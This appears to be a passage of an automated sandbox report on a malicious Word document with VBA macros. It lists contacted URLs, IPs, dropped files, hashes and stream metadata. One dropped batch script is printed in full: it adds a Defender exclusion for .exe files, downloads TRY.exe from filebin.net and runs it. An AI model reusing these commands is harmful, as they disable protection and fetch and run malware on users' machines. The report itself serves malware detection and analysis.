https://portal.office.com/account/?ref=ClientMeControl	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://graph.ppe.windows.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:	~DF20725BC976A732BA.TMP.3.dr, ~DF3B9CC377E0CCEDD0.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DFFFE9197EB1FCF16E.TMP.3.dr, ~DFAB5AE087B19AB60D.TMP.3.dr, ~DFAC439D90DB59E05A.TMP.3.dr	true	Avira URL Cloud: malware	unknown
https://officeci.azurewebsites.net/api/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://store.office.cn/addinstemplate	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://globaldisco.crm.dynamics.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dev0-api.acompli.net/autodetect	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480	~DF20598E5DAB6B2B3C.TMP.3.dr	true	Avira URL Cloud: malware	unknown
https://www.odwebp.svc.ms	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://web.microsoftstream.com/video/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://filebin.net/rf43v6qzghbj7h7b/$	54841c.rbs.3.dr	true	Avira URL Cloud: malware	unknown
https://graph.windows.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dataservice.o365filtering.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://ncus.contentsync.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
http://weather.service.msn.com/data.aspx	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://apis.live.net/v5.0/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://filebin.net/rf43v6qzghbj7h7b/	54841c.rbs.3.dr	true	Avira URL Cloud: malware	unknown
https://management.azure.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office365.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://wus2.contentsync.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.office.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://incidents.diagnosticssdf.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://entitlement.diagnostics.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://substrate.office.com/search/api/v2/init	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office365.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://webshell.suite.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://management.azure.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://devnull.onenote.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://ncus.pagecontentsync.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://messaging.office.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
87.238.33.8	situla.bitbit.net	Norway	39029	REDPILL-LINPRORedpillLinproNO	false
185.47.40.36	filebin.net	Norway	39029	REDPILL-LINPRORedpillLinproNO	true
87.238.33.7	unknown	Norway	39029	REDPILL-LINPRORedpillLinproNO	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	611840
Start date and time: 20/04/202209:26:59	2022-04-20 09:26:59 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 14s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	12543_0008858249_FWDOUTSTANDING_20200604.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.winDOC@26/45@4/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 58.5%) Quality average: 35.5% Quality standard deviation: 35.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.88.38, 52.109.12.22, 52.109.88.40
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
09:28:14	API Interceptor	1x Sleep call for process: msiexec.exe modified
09:28:32	API Interceptor	73x Sleep call for process: powershell.exe modified

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	8063
Entropy (8bit):	5.625948505702219
Encrypted:	false
SSDEEP:	96:v9uACuuAIwneyhESsU7eD2XveCsvRqTU7eD2XveC6jzT9XuA5vRqnHmuAl/5+ZNA:v9uYuweI3vdq3vdeumuKIZuJ6pI
MD5:	149B8F4389796AC425C6DCC6B8FA2337
SHA1:	9222AA785E8BDE91B7DD2D077CB35A0395C54E5E
SHA-256:	F742177C583D3E543EA5E89955D8D516D6696E8AC5D2D51DEDEAB1B23551DF54
SHA-512:	80B9059625AF5A4F0D5CBDF5BF05444C2C9226E74C9A544D0A6455E886EBEF56ECAC702417F6EE913FDEC132362596ACB234C45121F1A9EA8C7780ECE4BED1C7
Malicious:	false
Preview:	...@IXOS.@.....@.K.T.@.....@.....@.....@.....@.....@......&.{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}P.Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..TRY.msi.@.....@.G...@.....@......ProductIcon..&.{4982A61C-946D-4168-809C-13FF99C4C351}.....@.....@.....@.....@.......@.....@.....@.......@....P.Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}&.{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....*.SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\...@....(.&...LogonUser..user'.&...USERNAME..pratesh'.&...Date..4/20/2022'.&...Time..9:29:17'.&...WRAPPED_ARGUMENTS....RegisterProduct..Registering product..[1]......C:\Windows\Installer\54841d.msi......C:\Windows\Inst

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	144710
Entropy (8bit):	5.3569214769936435
Encrypted:	false
SSDEEP:	1536:+cQIfgxgBdB3guw0/Q9DQW+zzWk4F77nXmvidZXHETLWZ69:YIQ9DQW+zyXkf
MD5:	AE03C71171234246FD0F4CA50039F028
SHA1:	AF9B8FFB934FCE17096A93EF0D413905370F6A8E
SHA-256:	B2817D0D5F3029079273D4B6F49F7BCC506FAE3AD367537AFC95F7BD3BF0EBAE
SHA-512:	A322093A3F955DB77D5F2621B2B78116F4AE09CB561D43A7956137ADF82AB3C40A1376B032AD61678E84B5B4660C8F3239BCD70FF49700883B01040CC5680021
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-04-20T07:28:10">.. Build: 16.0.15210.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1108
Entropy (8bit):	5.269572569370992
Encrypted:	false
SSDEEP:	24:3XoPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKEbC:noPerB4nqRL/HvFe9t4Cv94zO
MD5:	5BA537743CCA330A1B68B49980D62AD3
SHA1:	7E7D39CA96A3298A5AD5FE29E85C3E6119CF4468
SHA-256:	BDE999834ED1E67AEAD208FD587E51E54DF418232A9D203350B43AF1DAB5736D
SHA-512:	253899EC94019C58F9E97D37B7D08D2312BC65DDF9D44FCAB76CC1C11126B75A59E15DB1E1AD7C8B92540574E5BE19359AB2739479BB7B2E663AF97D4F3568B7
Malicious:	false
Preview:	@...e...................................^............@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

Process:	C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	192
Entropy (8bit):	5.038473612824116
Encrypted:	false
SSDEEP:	3:mKDDGKSSJJFIGtxVfHeGAFddGeWLERy44ASVOGSJJFIGtATH3x85MHVWfILGYgPe:hSG8G3V/eGgdEWRy44ASQ98GSLh8uWfi
MD5:	0187F7CF14FF509BAFFEEDC6909AEF04
SHA1:	01689D0CD0070F66D2FA1465E79C43641A52574D
SHA-256:	C63EB9290E361D2474C8C8EA29869CA413005CC033146B54E30C3363C5B81170
SHA-512:	63C8B8F1214172258D137FBD166912A17053A032CCFBE188E71369A10D4D8F5F8CF97A109BC7E0C8DE19EADF7A29855A224C2092887191F8F38974012BB66F2F
Malicious:	false
Preview:	@echo off..powershell -command "Set-MpPreference -ExclusionExtension ".exe"..powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"..start TRY.exe

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Microsoft Cabinet archive data, 155244 bytes, 1 file
Category:	dropped
Size (bytes):	155244
Entropy (8bit):	6.820072420859643
Encrypted:	false
SSDEEP:	3072:avGygixtiq1P5GWp/icKAArDZz4/9GhbkrNEO1Yq:eUEpKy/90QEc
MD5:	2A683F9BE589B6F5581EA6298C95AFBC
SHA1:	B78112E20E2E465B58D803BF93ED458FE8492161
SHA-256:	8A64B66F67D4C199154659B5BB448173B46C1ADB1B2F9AE24CEFF17C858B96D5
SHA-512:	731B78A6DAABD45E375681F6CE60FD42A429C655EE93784B4599DDE78936DB307370A96D64F6B289DBDBA033F18B192F6DD47720E4976F6ABF5B49B3490348D9
Malicious:	false
Preview:	MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B............................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	155136
Entropy (8bit):	6.821026780783546
Encrypted:	false
SSDEEP:	3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
MD5:	96DF7B0C491646EFC2E5F2E9F0443B8B
SHA1:	560F0295ABE71FEFFF38912C1121B27E40237FE5
SHA-256:	4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
SHA-512:	E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 20 03:06:00 2022, Last Saved Time/Date: Wed Apr 20 03:06:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	6.071377383201628
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	12543_0008858249_FWDOUTSTANDING_20200604.doc
File size:	61952
MD5:	090e1dfdcbf2185788ea14cd113cc39f
SHA1:	6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:	3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
SHA512:	d4c9b997909b7bfa87090204a4a97179e61c98c10be73000ec68e32af8feddee19ca8c2bc0e9bf9e3cf040d6e0f4f58f2e0f09eef2936528d1f34c506dbb2e98
SSDEEP:	768:cAuIiy1a9Tq1aBs8jCjuHF7Y89AOEUYqyxrINSrCqxw+tCc27I/:cAFMm1aidiFk89ABrbr1xrt/2
TLSH:	65535CDDF2C2C4BBE12942B5E983C7A6B3BC3E292D1293172574371F3C75924C661269
File Content Preview:	........................>.......................h...........k...............g..................................................................................................................................................................................

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Title:
Subject:
Author:
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2022-04-20 02:06:00
Last Saved Time:	2022-04-20 02:06:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1773
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . k . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 1c 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 23 03 00 00 0b 05 00 00 00 00 00 00 01 00 00 00 bf 6b 0f 39 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.229954151382
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 05 00 00 00 68 00 00 00 06 00 00 00 70 00 00 00 11 00 00 00 78 00 00 00 17 00 00 00 80 00 00 00 0b 00 00 00 88 00 00 00 10 00 00 00 90 00 00 00 13 00 00 00 98 00 00 00 16 00 00 00 a0 00 00 00

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.414636097734
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f4 00 00 00

General
Stream Path:	1Table
File Type:	data
Stream Size:	7133
Entropy:	5.86601132644
Base64 Encoded:	True
Data ASCII:	. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	367
Entropy:	5.30381145663
Base64 Encoded:	True
Data ASCII:	I D = " { 0 6 2 5 E 4 4 A - E 7 6 5 - 4 1 C E - 9 D F D - C 3 4 7 3 6 B 7 5 A 4 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 3 C 1 2 6 B 2 3 E B 6 3 E B 6 3 E B 6 3 E B 6 " . . D P B = " D 7 D 5 3 2 A E 5 2 D 6 6 7 D 7 6 7 D 7 6 7 " . . G C = " E B E 9 0 E D A 2 3 D B 2 3 D B D C " . . . . [ H o s t E x t e n d e r I n f o ]
